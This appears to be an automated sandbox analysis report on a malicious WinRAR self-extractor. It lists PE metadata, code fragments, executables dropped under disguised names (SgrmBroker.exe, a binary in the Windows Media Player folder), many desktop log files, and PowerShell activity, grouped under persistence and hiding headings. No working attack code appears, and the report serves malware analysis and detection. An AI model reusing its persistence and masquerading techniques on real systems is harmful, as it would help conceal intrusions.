Source: Ccp3sJPDXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Ccp3sJPDXs.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: Ccp3sJPDXs.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Ccp3sJPDXs.exe

Source: Ccp3sJPDXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Ccp3sJPDXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Ccp3sJPDXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Ccp3sJPDXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Ccp3sJPDXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

File created: C:\SavesHost\__tmp_rar_sfx_access_check_5368593

Jump to behavior

Source: Ccp3sJPDXs.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007EF640 push ecx; ret	0_2_007EF653
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007EEB78 push eax; ret	0_2_007EEB96
Source: C:\SavesHost\Blockbrowser.exe	Code function: 5_2_00007FF848D008E8 push FFFFFFE9h; ret	5_2_00007FF848D00909
Source: C:\SavesHost\Blockbrowser.exe	Code function: 5_2_00007FF8490C7967 push ebx; retf	5_2_00007FF8490C796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848BDD2A5 pushad ; iretd	8_2_00007FF848BDD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848CFC445 push ebx; retf	8_2_00007FF848CFC44A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848DC2316 push 8B485F92h; iretd	8_2_00007FF848DC231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF848BCD2A5 pushad ; iretd	9_2_00007FF848BCD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF848DB2316 push 8B485F93h; iretd	9_2_00007FF848DB231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FF848BDD2A5 pushad ; iretd	11_2_00007FF848BDD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FF848CFAA97 push esp; retf	11_2_00007FF848CFAA98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FF848CF08BD push E958ED1Ch; ret	11_2_00007FF848CF0909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FF848DC2316 push 8B485F92h; iretd	11_2_00007FF848DC231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FF848BCD2A5 pushad ; iretd	13_2_00007FF848BCD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FF848CEC445 push ebx; retf	13_2_00007FF848CEC44A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FF848DB9FF1 push esi; retf	13_2_00007FF848DBA07A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FF848DB2316 push 8B485F93h; iretd	13_2_00007FF848DB231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FF848DBA073 push esi; retf	13_2_00007FF848DBA07A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FF848BED2A5 pushad ; iretd	15_2_00007FF848BED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FF848D0C445 push ebx; retf	15_2_00007FF848D0C44A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FF848DD2316 push 8B485F91h; iretd	15_2_00007FF848DD231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF848BBD2A5 pushad ; iretd	17_2_00007FF848BBD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF848CD2325 push eax; iretd	17_2_00007FF848CD233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF848CD08BD push eax; ret	17_2_00007FF848CD087D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF848CD089D push eax; ret	17_2_00007FF848CD087D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF848CD0855 push eax; ret	17_2_00007FF848CD087D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF848CDC445 push ebx; retf	17_2_00007FF848CDC44A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF848DA2316 push 8B485F94h; iretd	17_2_00007FF848DA231B
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Code function: 25_2_00007FF848CD08E8 push FFFFFFE9h; ret	25_2_00007FF848CD0909
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Code function: 25_2_00007FF849097967 push ebx; retf	25_2_00007FF84909796A

Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\xJfQbpmT.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\UQJnCrwb.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\YYGwXJrX.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\Public\Documents\0ZuAkTjxKX.exe	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\NzeXyGEM.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\SnwWbCTA.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\lpgkkzWs.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\ZI0Zcb1pDT.exe	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\KxrpdWzR.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\LipXSOru.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\lxQDOiwy.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\ezcDmTCJ.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\sCWCXWYE.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\hHZMHlwF.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\lgJkAMCv.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\TcFfQdBd.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\JRXzWseY.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\XnIOiRzu.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\unCSekjx.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\UgLFMzEy.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\OvRyOCaQ.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\SavesHost\SgrmBroker.exe	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\JulPgBvw.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\uaYsybMf.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\apvwEADp.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\wdLbULQa.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\ouZtCEeJ.log	Jump to dropped file
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	File created: C:\SavesHost\Blockbrowser.exe	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\ziDjmQZr.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\eOeVwbKg.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\bGNUAWQL.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\IxKHLBgB.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\slPjJBeC.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\bdzEpOzn.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\OwFfUGTH.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\ZEamenMP.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\bVPmLfYi.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\Opngnglp.log	Jump to dropped file

Source: C:\SavesHost\Blockbrowser.exe

File created: C:\Users\user\ZI0Zcb1pDT.exe

Jump to dropped file

Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\lxQDOiwy.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\ZEamenMP.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\IxKHLBgB.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\xJfQbpmT.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\hHZMHlwF.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\YYGwXJrX.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\Opngnglp.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\wdLbULQa.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\lpgkkzWs.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\bGNUAWQL.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\lgJkAMCv.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\ezcDmTCJ.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\UQJnCrwb.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\LipXSOru.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\uaYsybMf.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\TcFfQdBd.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	File created: C:\Users\user\Desktop\JulPgBvw.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\OwFfUGTH.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\OvRyOCaQ.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\eOeVwbKg.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\UgLFMzEy.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\KxrpdWzR.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\slPjJBeC.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\bdzEpOzn.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\JRXzWseY.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\ziDjmQZr.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\ouZtCEeJ.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\XnIOiRzu.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\NzeXyGEM.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\unCSekjx.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\bVPmLfYi.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\SnwWbCTA.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\sCWCXWYE.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File created: C:\Users\user\Desktop\apvwEADp.log	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\SavesHost\Blockbrowser.exe

File created: C:\Users\user\ZI0Zcb1pDT.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
